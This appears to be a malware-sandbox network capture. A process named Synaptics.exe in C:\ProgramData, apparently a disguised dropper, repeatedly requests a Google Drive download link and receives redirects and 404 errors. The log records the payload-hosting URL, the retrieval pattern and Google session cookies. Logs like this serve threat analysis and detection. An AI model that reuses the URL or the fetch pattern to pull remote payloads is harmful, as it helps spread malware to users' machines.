                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-YtL-f38TYat2C0OSNXcuAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      35 | 192.168.2.6 | 49871 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:48 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:48 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-v5C1F-j27OB6j5Hpj-yTXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      36 | 192.168.2.6 | 49872 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:48 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:48 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC7zw3Cy7V4RUsdhBpaaYUUlA79ahimYQjFgdyjqeOjvHujYtRsMsaegWWjQKB3nxsyM
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:48 GMT
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-D1nQFe1mu63h61C2NEWQ-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:48 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:40:48 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="7jzsIQUJwyu3pRGlCcH7jg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:40:48 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      37 | 192.168.2.6 | 49874 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:48 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:49 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC6Jhg2hCTUy3ese7-BAkYlQQmrcsKh-dT0_DMpkMJdyOSIav5yCzWAVV_z9377v5xnH3iUpesU
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:49 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-QnELD4iSBQ4z4wHvxTmLhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:49 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:49 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="0nNVXhXTsNXO_1m4RxqIZg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:49 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      38 | 192.168.2.6 | 49880 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:49 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      39 | 192.168.2.6 | 49881 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:49 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      40 | 192.168.2.6 | 49883 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:49 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      41 | 192.168.2.6 | 49893 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:50 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:50 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:50 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-UhRKi85XObJKww2x_M-Jig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      42 | 192.168.2.6 | 49894 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:50 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:50 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:50 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zjqRDiL6YWHT3wgYjx44fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      43 | 192.168.2.6 | 49902 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:51 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=Yuz7RKwQEmloTaTTA976nrnkFQ7N5Ob3pnCam2NVZl0sB_Ud02smlILDTDMmhSw5alN9qYua8UwJYg8uP4GqMg-ydOrOsxWCz2mBh0SXqRIaBniutRP5BkN5ceAVzF4EhGF6V34nDgJ3XudT8SM4aVp_Cp4zGI-RnpiVAHIlijow4CMrQ_jiekk
                                                                                                                      2024-12-30 10:40:51 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:51 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-rXObeHOu0g0zEqHioJyb_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      44 | 192.168.2.6 | 49904 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:51 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:51 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC4lrNtNmMrZFu1nW6CgRsnm3e08VyybeC672SKzCK1KSl_xQof1OvMDAN9c45jbzoSK
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:51 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-GhGD48duzjwWq0iHhpvSjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:51 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:40:51 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="90_xbrI0ANdQw76QGkPGvw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:40:51 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      45 | 192.168.2.6 | 49903 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:51 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=Yuz7RKwQEmloTaTTA976nrnkFQ7N5Ob3pnCam2NVZl0sB_Ud02smlILDTDMmhSw5alN9qYua8UwJYg8uP4GqMg-ydOrOsxWCz2mBh0SXqRIaBniutRP5BkN5ceAVzF4EhGF6V34nDgJ3XudT8SM4aVp_Cp4zGI-RnpiVAHIlijow4CMrQ_jiekk
                                                                                                                      2024-12-30 10:40:52 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:51 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-tyd0yqc0-V6-4Yt1jDrJSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      46 | 192.168.2.6 | 49905 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:51 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:52 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC4d92cJFdJiVNa9eFSZfKv7P6lnDXO2BYw7OmGT1S3ie9_IqHopdM1CkgH66KCyI10n-8hNfJ0
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:51 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ZC-wFo_hQk4T4hNQ4pBcVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:52 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
